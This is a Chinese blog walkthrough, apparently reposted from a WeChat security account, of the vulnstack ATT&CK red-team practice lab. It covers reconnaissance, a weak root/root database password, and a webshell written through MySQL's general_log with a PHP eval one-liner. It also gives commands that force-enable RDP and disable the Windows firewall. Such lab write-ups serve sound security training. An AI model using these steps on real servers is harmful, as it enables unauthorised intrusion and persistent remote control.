ATT&CK红队评估实战靶场(一)

admin 2022年3月30日20:03:17评论315 views字数 1322阅读4分24秒阅读模式

靶场的描述

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。

拓扑图如下所示:


ATT&CK红队评估实战靶场(一)

这里的攻击机使用的kali,web服务器用的是win7,域成员分别是windows2003、windows2008。

ATT&CK红队评估实战靶场(一)



网络划分:

kali设置成NAT模式,win7网络适配器1设置成自定义(VMnet1仅主机模式),网络适配器2设置成NAT模式,win2003、win2008 网络适配器设置成自定义(VMnet1仅主机模式)

攻击机:kali ip:192.168.96.128 / 物理机 ip:192.168.96.1win7 内网ip:192.168.52.143 外网ip:192.168.96.129win2003 ip:192.168.52.141win2008 ip:192.168.52.138

最后测试各个PC的连通性,如果kali ping win7不通不要紧,因为win7开了防火墙。

信息收集:

利用nmap扫描服务器外网ip,发现开放了80,3306等端口

ATT&CK红队评估实战靶场(一)


直接访问ip,发现绝对路径服务器版本操作系统等信息暴露

ATT&CK红队评估实战靶场(一)


利用工具扫描目录。发现了phpmyadmin和备份文件路径,可直接访问备份文件然后下载。

ATT&CK红队评估实战靶场(一)


下载备份文件发现有一个cms,然后访问cms路径后,存在信息泄露直接进入网站后台。

ATT&CK红队评估实战靶场(一)


漏洞探测:

(1)网页前端存在信息泄露,可直接进入后台

ATT&CK红队评估实战靶场(一)

后台管理界面

ATT&CK红队评估实战靶场(一)


(2)数据库系统存在弱口令

连接数据库,直接弱口令一波,用户名:root 密码:root

ATT&CK红队评估实战靶场(一)

(3)留言板存在储存型xss漏洞

ATT&CK红队评估实战靶场(一)

(4)后台管理存在任意文件改写

ATT&CK红队评估实战靶场(一)


利用漏洞拿webshell

这里我利用phpMyAdmin开启全局日志getshell

首先查看general_log是否开启,执行下面SQL语句

show variables like '%general%';

ATT&CK红队评估实战靶场(一)

发现没有打开,执行以下语句打开它,并且将存放日志内容改为c:/phpStudy/www/shell.php

set global general_log='on' set global general_log_file='C:/phpStudy/www/shell.php' 


ATT&CK红队评估实战靶场(一)

ATT&CK红队评估实战靶场(一)


往日志文件里写木马

 select "<?php @eval($_POST['shell']);?>"

ATT&CK红队评估实战靶场(一)


蚁剑连接成功拿到webshell

ATT&CK红队评估实战靶场(一)


权限提升:

尝试连接远程桌面,但是3389端口没有打开,可以用命令强制打开

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

ATT&CK红队评估实战靶场(一)


关闭服务器防火墙

netsh firewall set opmode disable

添加新用户,注意密码要符合本地安全策略

ATT&CK红队评估实战靶场(一)


利用创建的用户成功远程连接桌面

ATT&CK红队评估实战靶场(一)

备注:

目前只完成了一半,内网渗透请关注下期。

靶场下载地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

原文始发于微信公众号(小雪花安全团队):ATT&CK红队评估实战靶场(一)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月30日20:03:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ATT&CK红队评估实战靶场(一)https://cn-sec.com/archives/854446.html

发表评论

匿名网友 填写信息